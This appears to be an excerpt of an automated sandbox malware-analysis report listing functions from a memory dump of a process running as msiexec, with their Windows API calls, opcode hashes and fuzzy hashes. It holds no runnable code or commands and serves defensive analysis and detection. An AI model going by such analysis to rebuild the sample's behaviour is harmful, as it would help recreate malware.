                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3150196962-0
                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 3154509469-0
                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                            • String ID:
                                                                            • API String ID: 4232544981-0
                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                            Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                            Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 3859505661-0
                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                            Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: EnumNamesResource
                                                                            • String ID:
                                                                            • API String ID: 3334572018-0
                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                            Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                            Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                            Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                            Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004095FC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3655998216-0
                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00445426
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                            • String ID:
                                                                            • API String ID: 1828521557-0
                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                            Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID:
                                                                            • API String ID: 2081463915-0
                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                            • String ID:
                                                                            • API String ID: 2136311172-0
                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                            Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                            • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
